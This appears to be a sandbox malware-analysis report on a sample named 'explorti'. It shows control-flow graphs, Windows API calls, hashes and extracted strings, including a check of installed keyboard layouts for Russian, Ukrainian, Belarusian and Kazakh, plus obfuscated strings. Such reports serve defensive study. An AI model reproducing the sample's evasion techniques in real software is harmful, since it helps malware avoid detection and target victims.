                        • Not Executed
                        control_flow_graph 915 f55df0-f55eee 921 f55ef0-f55efc 915->921 922 f55f18-f55f25 call f6cf21 915->922 923 f55f0e-f55f15 call f6d593 921->923 924 f55efe-f55f0c 921->924 923->922 924->923 926 f55f26-f560ad call f86b9a call f6e080 call f67f30 * 5 RegOpenKeyExA 924->926 944 f560b3-f56143 call f84020 926->944 945 f56478-f56481 926->945 968 f56466-f56472 944->968 969 f56149-f5614d 944->969 946 f56483-f5648e 945->946 947 f564ae-f564b7 945->947 949 f564a4-f564ab call f6d593 946->949 950 f56490-f5649e 946->950 951 f564e4-f564ed 947->951 952 f564b9-f564c4 947->952 949->947 950->949 956 f5659e-f565a3 call f86b9a 950->956 954 f564ef-f564fa 951->954 955 f5651a-f56523 951->955 958 f564c6-f564d4 952->958 959 f564da-f564e1 call f6d593 952->959 960 f56510-f56517 call f6d593 954->960 961 f564fc-f5650a 954->961 963 f56525-f56530 955->963 964 f5654c-f56555 955->964 958->956 958->959 959->951 960->955 961->956 961->960 972 f56542-f56549 call f6d593 963->972 973 f56532-f56540 963->973 974 f56557-f56566 964->974 975 f56582-f5659d call f6cf21 964->975 968->945 977 f56460 969->977 978 f56153-f56187 RegEnumValueW 969->978 972->964 973->956 973->972 982 f56578-f5657f call f6d593 974->982 983 f56568-f56576 974->983 977->968 985 f5644d-f56454 978->985 986 f5618d-f561ad 978->986 982->975 983->956 983->982 985->978 992 f5645a 985->992 991 f561b0-f561b9 986->991 991->991 993 f561bb-f5624d call f67c50 call f68090 call f67870 * 2 call f55c60 991->993 992->977 993->985
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                        • API String ID: 0-3963862150
                        • Opcode ID: 88d870939f74747978297f1341522c16ef67a422ac8e135dc3acbf6457e428ad
                        • Instruction ID: f9949ee5816f789b5a5403ebe5d14e2f128ecfa24b855fc4e3e002f8ee0d8596
                        • Opcode Fuzzy Hash: 88d870939f74747978297f1341522c16ef67a422ac8e135dc3acbf6457e428ad
                        • Instruction Fuzzy Hash: 21E1AF71900218ABEB24DFA4CC89BDEB779AF04304F5442D9E909A7291D774AFC8DF91
                        Function 00F57D00 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 392COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1003 f57d00-f57d82 call f84020 1007 f5827e-f5829b call f6cf21 1003->1007 1008 f57d88-f57db0 call f67870 call f55b20 1003->1008 1015 f57db4-f57dd6 call f67870 call f55b20 1008->1015 1016 f57db2 1008->1016 1021 f57dd8 1015->1021 1022 f57dda-f57df3 1015->1022 1016->1015 1021->1022 1025 f57df5-f57e04 1022->1025 1026 f57e24-f57e4f 1022->1026 1029 f57e06-f57e14 1025->1029 1030 f57e1a-f57e21 call f6d593 1025->1030 1027 f57e51-f57e60 1026->1027 1028 f57e80-f57ea1 1026->1028 1032 f57e76-f57e7d call f6d593 1027->1032 1033 f57e62-f57e70 1027->1033 1034 f57ea7-f57eac 1028->1034 1035 f57ea3-f57ea5 GetNativeSystemInfo 1028->1035 1029->1030 1036 f5829c call f86b9a 1029->1036 1030->1026 1032->1028 1033->1032 1033->1036 1040 f57ead-f57eb6 1034->1040 1035->1040 1041 f582a1-f582a6 call f86b9a 1036->1041 1044 f57ed4-f57ed7 1040->1044 1045 f57eb8-f57ebf 1040->1045 1046 f57edd-f57ee6 1044->1046 1047 f5821f-f58222 1044->1047 1049 f57ec5-f57ecf 1045->1049 1050 f58279 1045->1050 1052 f57ef9-f57efc 1046->1052 1053 f57ee8-f57ef4 1046->1053 1047->1050 1054 f58224-f5822d 1047->1054 1051 f58274 1049->1051 1050->1007 1051->1050 1056 f57f02-f57f09 1052->1056 1057 f581fc-f581fe 1052->1057 1053->1051 1058 f58254-f58257 1054->1058 1059 f5822f-f58233 1054->1059 1060 f57f0f-f57f6b call f67870 call f55b20 call f67870 call f55b20 call f55c60 1056->1060 1061 f57fe9-f581e5 call f67870 call f55b20 call f67870 call f55b20 call f55c60 call f67870 call f55b20 call f55640 call f67870 call f55b20 call f67870 call f55b20 call f55c60 call f67870 call f55b20 call f55640 call f67870 call f55b20 call f67870 call f55b20 call f55c60 call f67870 call f55b20 call f55640 1056->1061 1066 f58200-f5820a 1057->1066 1067 f5820c-f5820f 1057->1067 1064 f58265-f58271 1058->1064 1065 f58259-f58263 1058->1065 1062 f58235-f5823a 1059->1062 1063 f58248-f58252 1059->1063 1089 f57f70-f57f77 1060->1089 1102 f581eb-f581f4 1061->1102 1062->1063 1070 f5823c-f58246 1062->1070 1063->1050 1064->1051 1065->1050 1066->1051 1067->1050 1068 f58211-f5821d 1067->1068 1068->1051 1070->1050 1090 f57f79 1089->1090 1091 f57f7b-f57f9b call f88a81 1089->1091 1090->1091 1097 f57fd2-f57fd4 1091->1097 1098 f57f9d-f57fac 1091->1098 1097->1102 1103 f57fda-f57fe4 1097->1103 1100 f57fc2-f57fcf call f6d593 1098->1100 1101 f57fae-f57fbc 1098->1101 1100->1097 1101->1041 1101->1100 1102->1047 1107 f581f6 1102->1107 1103->1102 1107->1057
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F57EA3
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID: Dp$HlurNa==$HlurOK==$HlusMa==
                        • API String ID: 1721193555-1904828215
                        • Opcode ID: 54fa79145d98164bcff80997f7f7dbaf400f8ee8708031a6f811db213bd8fea4
                        • Instruction ID: 75b802cd8096cf632a6b8f5b7ae51ddbee72b06ac440384e3d6c34ec8ef9593f
                        • Opcode Fuzzy Hash: 54fa79145d98164bcff80997f7f7dbaf400f8ee8708031a6f811db213bd8fea4
                        • Instruction Fuzzy Hash: 90D12B70E007049BDF14BB28DC5B39D7B71AB42325F544288E905AB3C2DB399E85ABD2
                        Function 00F86E01 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1141 f86e01-f86e36 GetFileType 1142 f86e3c-f86e47 1141->1142 1143 f86eee-f86ef1 1141->1143 1146 f86e69-f86e85 call f84020 GetFileInformationByHandle 1142->1146 1147 f86e49-f86e5a call f87177 1142->1147 1144 f86f1a-f86f42 1143->1144 1145 f86ef3-f86ef6 1143->1145 1151 f86f5f-f86f61 1144->1151 1152 f86f44-f86f57 1144->1152 1145->1144 1149 f86ef8-f86efa 1145->1149 1155 f86f0b-f86f18 call f8740d 1146->1155 1163 f86e8b-f86ecd call f870c9 call f86f71 * 3 1146->1163 1159 f86e60-f86e67 1147->1159 1160 f86f07-f86f09 1147->1160 1149->1155 1156 f86efc-f86f01 call f87443 1149->1156 1154 f86f62-f86f70 call f6cf21 1151->1154 1152->1151 1164 f86f59-f86f5c 1152->1164 1155->1160 1156->1160 1159->1146 1160->1154 1177 f86ed2-f86eea call f87096 1163->1177 1164->1151 1177->1151 1180 f86eec 1177->1180 1180->1160
                        APIs
                        • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00F86E23
                        • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00F86E7D
                        • __dosmaperr.LIBCMT ref: 00F86F12
                          • Part of subcall function 00F87177: __dosmaperr.LIBCMT ref: 00F871AC
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: File__dosmaperr$HandleInformationType
                        • String ID:
                        • API String ID: 2531987475-0
                        • Opcode ID: b3e92aeb1a54e1d2056634ccd939d916b13d98875f962fa464d38fb1f9bdbc9a
                        • Instruction ID: 95a2865cbaf9ffa0e0f43aa5e018d500ba3dc2a2a16dd651e71dc45c3b1ac36f
                        • Opcode Fuzzy Hash: b3e92aeb1a54e1d2056634ccd939d916b13d98875f962fa464d38fb1f9bdbc9a
                        • Instruction Fuzzy Hash: 78414975900244AADB24FFB5EC45AEBBBF9EF88310B10452DF956D3610EB34E904EB61
                        Function 00F582B0 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1338 f582b0-f58331 call f84020 1342 f58333-f58338 1338->1342 1343 f5833d-f58365 call f67870 call f55b20 1338->1343 1344 f5847f-f5849b call f6cf21 1342->1344 1351 f58367 1343->1351 1352 f58369-f5838b call f67870 call f55b20 1343->1352 1351->1352 1357 f5838d 1352->1357 1358 f5838f-f583a8 1352->1358 1357->1358 1361 f583d9-f58404 1358->1361 1362 f583aa-f583b9 1358->1362 1365 f58406-f58415 1361->1365 1366 f58431-f58452 1361->1366 1363 f583cf-f583d6 call f6d593 1362->1363 1364 f583bb-f583c9 1362->1364 1363->1361 1364->1363 1369 f5849c-f584a1 call f86b9a 1364->1369 1371 f58427-f5842e call f6d593 1365->1371 1372 f58417-f58425 1365->1372 1367 f58454-f58456 GetNativeSystemInfo 1366->1367 1368 f58458-f5845d 1366->1368 1373 f5845e-f58465 1367->1373 1368->1373 1371->1366 1372->1369 1372->1371 1373->1344 1378 f58467-f5846f 1373->1378 1381 f58471-f58476 1378->1381 1382 f58478-f5847b 1378->1382 1381->1344 1382->1344 1383 f5847d 1382->1383 1383->1344
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00F58454
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID:
                        • API String ID: 1721193555-0
                        • Opcode ID: 04c8034eb5dd9550f5dcd12f5ad9badd0f341948b338cfb79f6215f47c183a4a
                        • Instruction ID: 13cca94070baa629d74cb0dda10b79ccb04b554e5f8434ea3f95d6129395be49
                        • Opcode Fuzzy Hash: 04c8034eb5dd9550f5dcd12f5ad9badd0f341948b338cfb79f6215f47c183a4a
                        • Instruction Fuzzy Hash: EF515970D002089BEB24EB38CC457EDB775EB45355F5042A8ED09B72C1EF359E859B91
                        Function 00F86C99 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1384 f86c99-f86ca5 1385 f86cc4-f86ce8 call f84020 1384->1385 1386 f86ca7-f86cc3 call f87430 call f87443 call f86b8a 1384->1386 1392 f86cea-f86d04 call f87430 call f87443 call f86b8a 1385->1392 1393 f86d06-f86d28 CreateFileW 1385->1393 1416 f86d72-f86d76 1392->1416 1394 f86d38-f86d3f call f86d77 1393->1394 1395 f86d2a-f86d2e call f86e01 1393->1395 1406 f86d40-f86d42 1394->1406 1402 f86d33-f86d36 1395->1402 1402->1406 1408 f86d64-f86d67 1406->1408 1409 f86d44-f86d61 call f84020 1406->1409 1412 f86d69-f86d6f 1408->1412 1413 f86d70 1408->1413 1409->1408 1412->1413 1413->1416
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 55c70076738c684a974723d4111c06b004990f290fe5fb1cb52f154cc677a222
                        • Instruction ID: 0644448696c6d6a4fedf6131ca164e870ef53fefdf1be15365877d93ce8caab4
                        • Opcode Fuzzy Hash: 55c70076738c684a974723d4111c06b004990f290fe5fb1cb52f154cc677a222
                        • Instruction Fuzzy Hash: 8921C872A05208BAEB11BB649C42FDF37699F41778F204311F9346B1D1D7749E05A7A2
                        Function 00F86F71 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1418 f86f71-f86f87 1419 f86f89-f86f8d 1418->1419 1420 f86f97-f86fa7 1418->1420 1419->1420 1421 f86f8f-f86f95 1419->1421 1424 f86fa9-f86fbb SystemTimeToTzSpecificLocalTime 1420->1424 1425 f86fe7-f86fea 1420->1425 1422 f86fec-f86ff7 call f6cf21 1421->1422 1424->1425 1427 f86fbd-f86fdd call f86ff8 1424->1427 1425->1422 1430 f86fe2-f86fe5 1427->1430 1430->1422
                        APIs
                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00F86FB3
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$LocalSpecificSystem
                        • String ID:
                        • API String ID: 2574697306-0
                        • Opcode ID: 69855e21b182245b1e6a91a1c6df22fc2fed6eb2052a8f90a4cfbc92c0d35cb4
                        • Instruction ID: 281fb899816f0c48a3adbdc950d7c2a9e193e77f5d16276f24dfea2b442371df
                        • Opcode Fuzzy Hash: 69855e21b182245b1e6a91a1c6df22fc2fed6eb2052a8f90a4cfbc92c0d35cb4
                        • Instruction Fuzzy Hash: B711F17290020CABDB10EED5D944EDFB7BCAF48310F605266F611E6180EB34EB44DB61
                        Function 00F66AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                        • Associated: 00000006.00000002.2883729972.0000000000F50000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883746071.0000000000FB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883796243.0000000000FB9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000000FBB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000122B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.0000000001257000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000125E000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2883811132.000000000126D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884012083.000000000126E000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884097985.000000000140D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000006.00000002.2884114830.000000000140F000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_f50000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 607ea1d273165d540a8dc8b52fbaf3ca98f97bead70f2630d67298d39efe21c0
                        • Instruction ID: c86d5c2248691f5d7b06d3b954d2a9f6a89246c8250237aa2ce28363228ee5dd
                        • Opcode Fuzzy Hash: 607ea1d273165d540a8dc8b52fbaf3ca98f97bead70f2630d67298d39efe21c0
                        • Instruction Fuzzy Hash: 86F0F471E40608BBC700BB78DC07B1DBB74AB47B60F900348E821672E1DA396A04ABD3
                        Function 04BE0CEA Relevance: .1, Instructions: 122COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1501 4be0cea-4be0cf3 1502 4be0cf5-4be0cf7 1501->1502 1503 4be0c92-4be0cd4 1501->1503 1502->1503 1505 4be0cf9-4be0dd8 1502->1505 1513 4be0cd5 1503->1513 1519 4be0ddf-4be0e4d 1505->1519 1513->1513
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cbaa3c702f7b2841a284413199dc392ab03128e93de77193abec9746b3119056
                        • Instruction ID: 7efbc504655d5964f02c2144963ad43c9bd53339d220fbbf2933abfbc6aa162f
                        • Opcode Fuzzy Hash: cbaa3c702f7b2841a284413199dc392ab03128e93de77193abec9746b3119056
                        • Instruction Fuzzy Hash: 6F21AAEB24D1317D6142A5436B10BFB676ED2C6730731C867F847C6602F3D96A893531
                        Function 04BE0CDB Relevance: .1, Instructions: 101COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1524 4be0cdb-4be0dd8 1534 4be0ddf-4be0e4d 1524->1534
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3def324a860cbe8241df050cb5b749746a372fabc174ceca4dfd34776edbd0e3
                        • Instruction ID: e5c2abee4e26700ad256ab0cfb1ce55019df3b947dc28750bf41b43c8b74a976
                        • Opcode Fuzzy Hash: 3def324a860cbe8241df050cb5b749746a372fabc174ceca4dfd34776edbd0e3
                        • Instruction Fuzzy Hash: A51182EB24C1757D6042A5432F10AFB6A6ED1C6730331C4A6BC47C6502F3D9AE893231
                        Function 04BE0D0A Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6933487bf078503e953d000a35cfa047e25aeba0035dbab23d655157a137cc4a
                        • Instruction ID: 033361174996beb800c394d7ca904516aa7e787634c936ac6543b9a6b8d007bd
                        • Opcode Fuzzy Hash: 6933487bf078503e953d000a35cfa047e25aeba0035dbab23d655157a137cc4a
                        • Instruction Fuzzy Hash: BA1152EB20C175BDA042A5536F10AFA676ED2C6730731C867F847C6506F3D96A8A7231
                        Function 04BE0D18 Relevance: .1, Instructions: 91COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 856d1abb3d467156d9ca1b5e7ac7110fc984ba00b1c5b322cfa134053e6dadb2
                        • Instruction ID: f3fe20164b732114efc41ace216ceb1dfa66642bd52e5cb5f124c9785ab11256
                        • Opcode Fuzzy Hash: 856d1abb3d467156d9ca1b5e7ac7110fc984ba00b1c5b322cfa134053e6dadb2
                        • Instruction Fuzzy Hash: 771182AB20C1717D6142A5836B54AFA6A6ED2C6730731C86BF847C6542E3D9AA4A3231
                        Function 04BE0D29 Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7e17977b31ceb87c415e4a548482795d4886636785e2d919a5c23a9917b4cda
                        • Instruction ID: 900d00133b5debd4e66290d5f1d895748e11d221ce86e1dc40f90548ef6de4da
                        • Opcode Fuzzy Hash: c7e17977b31ceb87c415e4a548482795d4886636785e2d919a5c23a9917b4cda
                        • Instruction Fuzzy Hash: 3311A5AB20C1707DA10295836B50AFB6BADD5C6730335C46BFC43C6502E3D9694A3231
                        Function 04BE0D41 Relevance: .1, Instructions: 80COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2885186408.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_4be0000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8047a72aab4bed9143bf2c01f841dfc17e43a87d3109526b41e820e211dc5294
                        • Instruction ID: da3f8f83cfc4060522b59fd5d434b5492569ef18aa970468cf335032ca8e7d13
                        • Opcode Fuzzy Hash: 8047a72aab4bed9143bf2c01f841dfc17e43a87d3109526b41e820e211dc5294
                        • Instruction Fuzzy Hash: B20180AB20C2747E6142A5437B10AFB6B6DD1C6730731C86BFC42C2402E3D969497231
